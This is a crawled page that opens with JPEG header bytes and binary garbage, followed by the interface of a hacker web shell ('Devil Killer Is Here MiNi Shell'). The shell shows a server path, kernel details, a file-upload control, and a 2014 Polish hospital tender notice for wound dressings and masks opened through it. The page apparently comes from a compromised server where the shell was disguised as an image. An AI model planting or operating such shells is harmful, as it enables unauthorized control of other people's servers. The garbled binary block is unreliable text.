JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140828/286458-N-2014.html

<p class="kh_header"><b>Kraków: DOSTAWY OPATRUNKÓW</b><br>
<b>Numer ogłoszenia: 286458 - 2014; data zamieszczenia: 28.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY OPATRUNKÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy opatrunków w podziale na 29 części.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 29.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Karty techniczne wyrobu charakteryzujące dane opisane  w pakiecie nr 2 (gramatura dla poz. 1-4 oraz spełnienie normy dla pozycji 5,6)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony FORMULARZ OFERTOWY - ZAŁĄCZNIK NR 1.
2) Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę.
3) Oświadczenie Wykonawcy dotyczące spełnienia warunków udziału w postępowaniu, ściśle według ZAŁĄCZNIKA NR 2.
4) Oświadczenie o korzystaniu z zasobów podmiotu trzeciego, ściśle według ZAŁĄCZNIKA NR 2A - o ile dotyczy.
5) Oświadczenie Wykonawcy o braku podstaw do wykluczenia, ściśle według ZAŁĄCZNIKA NR 3.
6) Oświadczenie Wykonawcy dotyczące przynależności do grupy kapitałowej ściśle według ZAŁĄCZNIKA NR 4.
7) Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8) Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 7 składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 13, zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 12 stosuje się odpowiednio.
10) Karty techniczne wyrobu charakteryzujące dane opisane  w pakiecie nr 2 (gramatura dla poz. 1-4 oraz spełnienie normy dla pozycji 5,6).
11) Wykonawca zobowiązany jest złożyć wraz z ofertą na pakiety nr: 2, 3,4, 17, 18, 20, 21, 22, 23, 24, 28,29 próbki zaoferowanych produktów (w jednym, z podanych rozmiarów), w celu dokonania oceny zgodności zaoferowanego przedmiotu zamówienia z wymaganiami określonymi przez Zamawiającego w SIWZ. Próbki zostaną zużyte w toku oceny ofert i nie podlegają zwrotowi. Niedołączenie próbek skutkuje odrzuceniem oferty bez wzywania o jej uzupełnienie.
Pakiet nr 2: poz. 1,2,3,4 - po 10 szt.
poz. 5 - 10 szt.
poz. 6 -50 szt.
Pakiet nr 3: poz. 1,2,3,4,5 - po 1 szt. (ok 9-10m) 
poz. 6,7 - po 50 szt. 
Pakiet nr  4:	poz. 1,2,3,- po 1 szt. 
Pakiet nr  17:	poz. 1,2,3,4- po 20 szt. 
Pakiet nr 18: poz. 1,2,3 - po 2 op.
poz. 4,5 - po 5 szt.
poz. 6,7,8- po 5 szt.
poz. 9 ,10- po1  szt. ( ok 20-25 m)
Pakiet nr 20: poz. 1,2,3 - po 10 szt.
poz. 4 -1 szt.
poz. 5,6 po 10 szt.
Pakiet nr 21: poz. 1,2,3,4,5 -  po 5 op.
Pakiet nr 22: poz. 1,2,3 -  po 5 op.
Pakiet nr 23: -  po 5 op.
Pakiet nr 24: poz. 1,2,3,4 -  po 5 op.
Pakiet nr 28:  - 10 szt.
Pakiet nr 29: poz. 1,2,3,4 -po  30 szt.
12) Wykaz próbek według formularza stanowiącego ZAŁĄCZNIK NR 6 do SIWZ - jeśli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie której dokonano wyboru Sprzedający, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą: 
a)	zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru,
b)	wydłużenia terminu obowiązywania umowy z powodu okoliczności niezależnych od Sprzedającego,
c)	zmiany danych Sprzedającego ( np. zmiana siędziby, adresu, nazwy),
d)	zmian organizacyjnych Kupującego powodujących, że wykonanie zamówienia lub jego części staje się bezprzedmio-towe,
e)	zmian w zakresię sposobu wykonywania zadań lub zasad funkcjonowania Kupującego powodujących, że wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówie-nia
f)	omyłek pisarskich lub błędów rachunkowych,
g)	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
h)	zmiany sposobu płatności, jeżeli wymagać tego będzie ochrona interesu Kupującego,
i)	obniżenia cen.
j)	 innych zmian korzystnych dla Kupującego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany ter-minu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamówienia Publiczne (budynek komendy nr 32) 5WSzKzP SP ZOZ, ul. Wrocławska 1-3, 30-901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2014 godzina 11:00, miejsce: Kancelaria Szpitala (budynek komendy nr 32) 5WSzKzP SP ZOZ, ul. Wrocławska 1-3, 30-901 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 Pieluchomajtki i podkłady chłonne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Podkład chłonny 60cm x 90cm z równomiernym rozłożeniem pulpy celulozowej, gruby, chłonność min. 1750 g	szt.	26000
2	Pieluchomajtki oddychające na całej powierzchni, posiadające ściągacze taliowe,  2 pary elastycznych przylepcorzepów, absorbent z neutralizacja zapachów  rozmiar S- chłonność min. 1600g, rozmiar M-chłonność min. 2300g, rozmiar L i XL -chłonność min. 2600g; x 30 szt., rozmiar do wyboru przy zamówieniu  	op.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 Czepki i maski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Czepek chirurga furażerka boki wykonane z dwóch warstw; chłonnej włókniny wiskozowej o gramaturze 25g/m2. Opakowany w oznakowane kartoniki gwarantujące higieniczne przechowywanie i wyjmowanie 	szt.	15000
2	Czepek - furażerka, część przednia wydłużona z możliwością wywinięcia, w części tylnej ściągacz, z włókniny wiskozowej o gramaturze min. 25g/m2. Opakowany w oznakowane kartoniki gwarantujące higieniczne przechowywanie i wyjmowanie	szt.	2000
3	Czepek pielęgniarski okrągły w kształcie beretu  ściągany  gumką - damski, z włókniny polipropylenowej o gramaturze min. 14g/m2. Opakowany w oznakowane kartoniki gwarantujące higieniczne przechowywanie i wyjmowanie	szt.	12000
4	Czepek - furażerka, wiązany z tyłu na troki, część przednia wydłużona z możliwością wywinięcia, z włókniny wiskozowej o gramaturze min. 25g/m2. Opakowany w oznakowane kartoniki gwarantujące higieniczne przechowywanie i wyjmowanie 	szt.	1000
5	Maska chirurgiczna spełniająca normę EN 14683 trójwarstwowa wiązana na troki z osłoną na oczy	szt.	200
6	Maska chirurgiczna trójwarstwowa wiązana na troki, spełniająca normę EN 14683 typ II, wyposażona w dodatkowy sztywnik, umożliwiający łatwe dopasowanie się maski do kształtu twarzy	szt.	42000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 Plastry opatrunkowe I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Przylepiec na  włókninie szerokość 1,25cm  	mb	6000
2	Przylepiec na  włókninie szerokość 2,5cm  	mb	9000
3	Przylepiec na  tkaninie szerokość 5cm  	mb	2000
4	Przylepiec na sztucznym jedwabiu szerokość 2,5cm  	mb	13000
5	Przylepiec  z opatrunkiem na włókninie szerokość  8cm 	mb	1200
6	Jałowy plaster do mocowania kaniul na włókninie 	szt.	55000
7	Jałowy plaster przezroczysty do mocowania kaniul wzmocniony włókniną	szt. 15000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 Plastry opatrunkowe II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Przylepiec chirurgiczny na włókninie 10cm x 10m	szt.	250
2	Przylepiec chirurgiczny na włókninie 15cm x 10m	szt.	250
3	Przylepiec chirurgiczny na włókninie 20 cm x 10m	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5  Opatrunki specjalistyczne I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sterylny przeźroczysty opatrunek samoprzylepny z folii poliuretanowej 6cm x 7cm	szt.	1000
2	Sterylny przeźroczysty opatrunek samoprzylepny z folii poliuretanowej 12cm x 25cm	szt.	1000
3	Sterylny opatrunek alginianowy  10 cm x 10 cm	szt.	200
Dopuszcza się 10% tolerancji w rozmiarach. Wszystkie opatrunki tego pakietu jednego producenta
4	Sterylny opatrunek antybakteryjny na bazie srebra 10 cm x 10 cm	szt.	600
5	Sterylny opatrunek antybakteryjny na bazie srebra 10 cm x 20 cm	szt.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 Opatrunki specjalistyczne II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sterylny opatrunek do ran wymagających aktywnego oczyszczenia- usuwania martwicy 24 h 7,5cm x 7,5cm	szt.	150
2	Sterylny opatrunek do ran wymagających aktywnego oczyszczenia- usuwania martwicy 24 h 10 cm x 10 cm	szt.	100
Dopuszcza się 20% tolerancji w rozmiarach. Wszystkie opatrunki tego pakietu jednego producenta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 Opatrunki specjalistyczne III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Hydrożel do usuwania martwicy 15g	szt.	40
Dopuszcza się możliwość przeliczenia na opakowania 20g i 25g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 Opatrunki specjalistyczne IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sterylny opatrunek hydrokoloidowy 5 cm x 5 cm	szt.	300
2	Sterylny opatrunek hydrokoloidowy 10 cmx 10 cm	szt.	2000
3	Sterylny opatrunek hydrokoloidowy 15 cm x 15 cm	szt.	300
Dopuszcza się 10% tolerancji w rozmiarach. Wszystkie opatrunki tego pakietu jednego producenta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 Opatrunki specjalistyczne V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sterylny opatrunek z chlorheksydyną np.typu Bactigras 15 cm x 1 m	szt.	30
2	Sterylny opatrunek z chlorheksydyną np.typu Bactigras 15 cm x 20 cm	szt.	500
3	Sterylny opatrunek z chlorheksydyną np.typu Bactigras 10 cm x 10 cm	szt.	1200
Dopuszcza się 10% tolerancji w rozmiarach. Wszystkie opatrunki tego pakietu jednego producenta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
